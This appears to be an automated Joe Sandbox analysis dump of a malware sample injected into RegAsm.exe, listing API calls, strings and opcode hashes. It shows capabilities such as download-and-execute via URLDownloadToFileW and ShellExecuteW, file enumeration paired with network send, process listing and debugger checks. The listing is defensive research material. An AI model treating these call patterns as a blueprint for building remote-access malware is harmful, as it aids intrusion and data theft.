                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                                                                              • String ID:
                                                                                              • API String ID: 1771804793-0
                                                                                              APIs
                                                                                                • Part of subcall function 0040C60C: SetLastError.KERNEL32(0000000D,0040CB8B,00000000,00000000,00000000), ref: 0040C612
                                                                                              • SetLastError.KERNEL32(000000C1,00000000,00000000,00000000), ref: 0040CBA2
                                                                                              • GetNativeSystemInfo.KERNEL32(?,00000000,00000000,00000000), ref: 0040CC15
                                                                                              • GetProcessHeap.KERNEL32(00000008,00000040), ref: 0040CC81
                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 0040CC88
                                                                                              • SetLastError.KERNEL32(0000045A), ref: 0040CD9A
                                                                                                • Part of subcall function 0040CB1F: VirtualFree.KERNEL32(00008000,00000000,00000000,?,0040CCA1,00000000,00000000,00008000,00000000), ref: 0040CB2B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$Heap$AllocFreeInfoNativeProcessSystemVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 486403682-0
                                                                                              APIs
                                                                                              • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 00414E74
                                                                                                • Part of subcall function 0040D202: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0040D211
                                                                                                • Part of subcall function 0040D202: RegSetValueExA.KERNEL32(?,00459EE8,00000000,?,00000000,00000000,00467F30,?,?,0040A763,00459EE8,5.1.3 Light), ref: 0040D239
                                                                                                • Part of subcall function 0040D202: RegCloseKey.KERNEL32(?,?,?,0040A763,00459EE8,5.1.3 Light), ref: 0040D244
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseCreateInfoParametersSystemValue
                                                                                              • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                                              • API String ID: 4127273184-3576401099
                                                                                              APIs
                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 004321E4
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 004321EE
                                                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 004321FB
                                                                                              Strings
                                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 00432105
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                              • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                              • API String ID: 3906539128-1068371695
                                                                                              APIs
                                                                                                • Part of subcall function 00414452: GetCurrentProcess.KERNEL32(00000001,?,00000000,0040907E,WinDir,00000000,00000000), ref: 00414463
                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040A81F
                                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 0040A841
                                                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040A9C8
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040A9D7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Process32$CloseCreateCurrentFirstHandleNextProcessSnapshotToolhelp32
                                                                                              • String ID:
                                                                                              • API String ID: 592884611-0
                                                                                              APIs
                                                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00404B51
                                                                                              • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 00404BE8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: DownloadExecuteFileShell
                                                                                              • String ID: open
                                                                                              • API String ID: 2825088817-2758837156
                                                                                              APIs
                                                                                              • FindFirstFileW.KERNEL32(00000000,?,?,00000000), ref: 00404D0E
                                                                                              • FindNextFileW.KERNEL32(00000000,?,?), ref: 00404DCE
                                                                                                • Part of subcall function 004018E7: send.WS2_32(?,00000000,00000000,00000000), ref: 0040195A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FileFind$FirstNextsend
                                                                                              • String ID: Y\@
                                                                                              • API String ID: 4113138495-4244545509
                                                                                              APIs
                                                                                                • Part of subcall function 0043C614: GetLastError.KERNEL32(?,00000000,0043783C,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C618
                                                                                                • Part of subcall function 0043C614: _free.LIBCMT ref: 0043C64B
                                                                                                • Part of subcall function 0043C614: SetLastError.KERNEL32(00000000,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C68C
                                                                                                • Part of subcall function 0043C614: _abort.LIBCMT ref: 0043C692
                                                                                                • Part of subcall function 0043C614: _free.LIBCMT ref: 0043C673
                                                                                                • Part of subcall function 0043C614: SetLastError.KERNEL32(00000000,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C680
                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00444328
                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00444379
                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00444439
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ErrorInfoLastLocale$_free$_abort
                                                                                              • String ID:
                                                                                              • API String ID: 2829624132-0
                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32(00000003,?,00438959,00000003,004619C0,0000000C,00438AB0,00000003,00000002,00000000,?,0043B5D8,00000003), ref: 004389A4
                                                                                              • TerminateProcess.KERNEL32(00000000,?,00438959,00000003,004619C0,0000000C,00438AB0,00000003,00000002,00000000,?,0043B5D8,00000003), ref: 004389AB
                                                                                              • ExitProcess.KERNEL32 ref: 004389BD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                              • String ID:
                                                                                              • API String ID: 1703294689-0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: .
                                                                                              • API String ID: 0-248832578
                                                                                              APIs
                                                                                              • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,00439B98,?,00000004), ref: 0043D37F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: InfoLocale
                                                                                              • String ID: GetLocaleInfoEx
                                                                                              • API String ID: 2299586839-2904428671
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              APIs
                                                                                              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00445537,?,?,00000008,?,?,00449C9D,00000000), ref: 00445769
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ExceptionRaise
                                                                                              • String ID:
                                                                                              • API String ID: 3997070919-0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 0
                                                                                              • API String ID: 0-4108050209
                                                                                              APIs
                                                                                              • IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 0042C3DF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FeaturePresentProcessor
                                                                                              • String ID:
                                                                                              • API String ID: 2325560087-0
                                                                                              APIs
                                                                                                • Part of subcall function 0043C614: GetLastError.KERNEL32(?,00000000,0043783C,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C618
                                                                                                • Part of subcall function 0043C614: _free.LIBCMT ref: 0043C64B
                                                                                                • Part of subcall function 0043C614: SetLastError.KERNEL32(00000000,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C68C
                                                                                                • Part of subcall function 0043C614: _abort.LIBCMT ref: 0043C692
                                                                                                • Part of subcall function 0043C614: _free.LIBCMT ref: 0043C673
                                                                                                • Part of subcall function 0043C614: SetLastError.KERNEL32(00000000,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C680
                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00444578
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$_free$InfoLocale_abort
                                                                                              • String ID:
                                                                                              • API String ID: 1663032902-0
                                                                                              APIs
                                                                                                • Part of subcall function 0043C614: GetLastError.KERNEL32(?,00000000,0043783C,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C618
                                                                                                • Part of subcall function 0043C614: _free.LIBCMT ref: 0043C64B
                                                                                                • Part of subcall function 0043C614: SetLastError.KERNEL32(00000000,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C68C
                                                                                                • Part of subcall function 0043C614: _abort.LIBCMT ref: 0043C692
                                                                                              • EnumSystemLocalesW.KERNEL32(004442D4,00000001,00000000,?,0043A13A,?,00444901,00000000,?,?,?), ref: 0044421E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                              • String ID:
                                                                                              • API String ID: 1084509184-0
                                                                                              APIs
                                                                                                • Part of subcall function 0043C614: GetLastError.KERNEL32(?,00000000,0043783C,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C618
                                                                                                • Part of subcall function 0043C614: _free.LIBCMT ref: 0043C64B
                                                                                                • Part of subcall function 0043C614: SetLastError.KERNEL32(00000000,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C68C
                                                                                                • Part of subcall function 0043C614: _abort.LIBCMT ref: 0043C692
                                                                                              • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,004444F2,00000000,00000000,?), ref: 00444780
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$InfoLocale_abort_free
                                                                                              • String ID:
                                                                                              • API String ID: 2692324296-0
                                                                                              APIs
                                                                                                • Part of subcall function 0043C614: GetLastError.KERNEL32(?,00000000,0043783C,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C618
                                                                                                • Part of subcall function 0043C614: _free.LIBCMT ref: 0043C64B
                                                                                                • Part of subcall function 0043C614: SetLastError.KERNEL32(00000000,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C68C
                                                                                                • Part of subcall function 0043C614: _abort.LIBCMT ref: 0043C692
                                                                                              • EnumSystemLocalesW.KERNEL32(00444524,00000001,?,?,0043A13A,?,004448C5,0043A13A,?,?,?,?,?,0043A13A,?,?), ref: 00444293
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                              • String ID:
                                                                                              • API String ID: 1084509184-0
                                                                                              APIs
                                                                                                • Part of subcall function 0043AD2A: EnterCriticalSection.KERNEL32(-00465500,?,004386A9,00000000,004619A0,0000000C,00438664,00000000,?,?,0043AFC8,00000000,?,0043C6C9,00000001,00000364), ref: 0043AD39
                                                                                              • EnumSystemLocalesW.KERNEL32(0043CE7F,00000001,00461B48,0000000C), ref: 0043CEFD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                              • String ID:
                                                                                              • API String ID: 1272433827-0
                                                                                              APIs
                                                                                                • Part of subcall function 0043C614: GetLastError.KERNEL32(?,00000000,0043783C,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C618
                                                                                                • Part of subcall function 0043C614: _free.LIBCMT ref: 0043C64B
                                                                                                • Part of subcall function 0043C614: SetLastError.KERNEL32(00000000,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C68C
                                                                                                • Part of subcall function 0043C614: _abort.LIBCMT ref: 0043C692
                                                                                              • EnumSystemLocalesW.KERNEL32(004440B8,00000001,?,?,?,00444923,0043A13A,?,?,?,?,?,0043A13A,?,?,?), ref: 00444198
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                              • String ID:
                                                                                              • API String ID: 1084509184-0
                                                                                              APIs
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_0002C6D0,0042C1C4), ref: 0042C6C9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                              • String ID:
                                                                                              • API String ID: 3192549508-0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              • API ID:
                                                                                              • String ID: 0
                                                                                              • API String ID: 0-4108050209
                                                                                              • Opcode ID: 00ef9a7d3e26296a65ddfeab7daadc8cf88223517f11c320cda8b7a0b82f5a53
                                                                                              • Instruction ID: 30eacb981cb6278b9ede921612644d04ced7297ace774c55fa6f37c82e0ba73a
                                                                                              • Opcode Fuzzy Hash: 00ef9a7d3e26296a65ddfeab7daadc8cf88223517f11c320cda8b7a0b82f5a53
                                                                                              • Instruction Fuzzy Hash: 8B5176A060164777EF3CA92884567BF67999F0E304F1AF80FD9C2D7382C62C9D06861E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              • API ID:
                                                                                              • String ID: 0
                                                                                              • API String ID: 0-4108050209
                                                                                              • Opcode ID: c4e470230f592cf2ea01b95aa03d306a2ecdbbcafd652f7a80073b6ae47f5522
                                                                                              • Instruction ID: 621a70b502a6b5c6d37222a8ff5bbc931b0a3dc879fdfe3d88000f589cd0ccb1
                                                                                              • Opcode Fuzzy Hash: c4e470230f592cf2ea01b95aa03d306a2ecdbbcafd652f7a80073b6ae47f5522
                                                                                              • Instruction Fuzzy Hash: D551576060060B76DB34696884557BF67D89B0F344F1AF41FD882EB382C50DFD06975E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              • API ID:
                                                                                              • String ID: @
                                                                                              • API String ID: 0-2766056989
                                                                                              • Opcode ID: afc649a906c918a612c1bf2ed60efbe29a77397457307a03108316727d093398
                                                                                              • Instruction ID: a32e6f4fee792168acabc3a99eaa4178362968a550f51f58417a862e767cbfd4
                                                                                              • Opcode Fuzzy Hash: afc649a906c918a612c1bf2ed60efbe29a77397457307a03108316727d093398
                                                                                              • Instruction Fuzzy Hash: B541D276D1061D9BCB04CFA9C5816DEFBF1FF88310F25816AE905B3350D379AA828B84
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: be7d55350c29dde4d9bf8e952ff0af0bb26ed02bc87ce8e620404103b0c57f2d
                                                                                              • Instruction ID: 728b4bcd2b28723637816e06e4881ec1bd9ce59320bf7fec46daf2244288b495
                                                                                              • Opcode Fuzzy Hash: be7d55350c29dde4d9bf8e952ff0af0bb26ed02bc87ce8e620404103b0c57f2d
                                                                                              • Instruction Fuzzy Hash: 6D322321D69F454DE7239638C862336A248EFB33C5F54C737E81AB5AA6EF29C4C34149
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 27ba41c287480f5b8183f811836f76d7f550f221e5fc56609452204e267aaea9
                                                                                              • Instruction ID: 6584078b23f89aed32d62d9620e82e9003f0c038ea44ebf7209e3ce05309007b
                                                                                              • Opcode Fuzzy Hash: 27ba41c287480f5b8183f811836f76d7f550f221e5fc56609452204e267aaea9
                                                                                              • Instruction Fuzzy Hash: 09321921D29F414DE7239634D825336A648AFB73C9F16D737F819B5EAAEB28C4C34109
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c968e86ef4a24f4bac8ff0bd1e5c72ae7075c91140b07428d43092b41367d369
                                                                                              • Instruction ID: 178965d57fe9952de82b7b97e0f16105608be4409eb057888a0a3f3c60355087
                                                                                              • Opcode Fuzzy Hash: c968e86ef4a24f4bac8ff0bd1e5c72ae7075c91140b07428d43092b41367d369
                                                                                              • Instruction Fuzzy Hash: 79026D716006518FC318CF2EE89057AB7F1FB8D302745863AE495CB796DB34E926CB98
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                              • Instruction ID: 191d1750cc2476baf38904309f755c3ad6ad9953389e3caa19d10b1414658eb7
                                                                                              • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                              • Instruction Fuzzy Hash: 7CC197322050930ADF2D8679887413FFAE15EA67B171A276FD8B3CB2D4EF28D524D524
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b1f959d54ae18500ce9e7136891542e4a21fb1d39be47b7c1d504fa72425430b
                                                                                              • Instruction ID: 0abdb9aafc57bb68438a50acd3f2ecbd6e1049ece67ae85b0bc1d56911e8b7ce
                                                                                              • Opcode Fuzzy Hash: b1f959d54ae18500ce9e7136891542e4a21fb1d39be47b7c1d504fa72425430b
                                                                                              • Instruction Fuzzy Hash: 51E16274A102688FCB08CF5DE8A18BE73F1FB49302745456EE582D7392CB35EA16DB94
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                              • Instruction ID: ee6c2d19268771462c9197f7b73242e64c44eb7a896abee3da5328890589ff8c
                                                                                              • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                              • Instruction Fuzzy Hash: 55C1D5322061930ADF2D867AC83413FBAE15E967B171A276FD4B3CB2D4EF18D524D624
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                              • Instruction ID: 4c33483144a6206e2481d487649dabb1675ca56e8a31ab94a4777204e3e8f2ea
                                                                                              • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                              • Instruction Fuzzy Hash: 29C1E73220609309DF2D8679C83013FFAE15AA67B171A2B6FD4B3CB2D4EF18D564D624
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                              • Instruction ID: a9be9406364418b117dfccb16ba3cbf4ac398d75b9daafeab1f7aac4f9d83a5b
                                                                                              • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                              • Instruction Fuzzy Hash: 28C1B53220619309DF2D8679C83413FFAE15AA57B171A275FD4B3CB2C4EF28E564D624
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 88fa2ac1d6c747d61fe04868a4c39498acd84e59d39d34293ce00cc94a508a9c
                                                                                              • Instruction ID: ba4722610437f29e61b715c0b74fc57c743cb2af62776873812a0077e47186ab
                                                                                              • Opcode Fuzzy Hash: 88fa2ac1d6c747d61fe04868a4c39498acd84e59d39d34293ce00cc94a508a9c
                                                                                              • Instruction Fuzzy Hash: 99B1B4391146929ACB05EF24C0913F27BA1FF6A304F1850B9DC9CCFB56E3399516EB64
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9d6a532daf8328cd9145a2a1080489925b78f33d54c9cc293e88b00a97174a33
                                                                                              • Instruction ID: 73028a218e6efc437b141c97914250212e1ee116e92d67fc33dd4042d6646766
                                                                                              • Opcode Fuzzy Hash: 9d6a532daf8328cd9145a2a1080489925b78f33d54c9cc293e88b00a97174a33
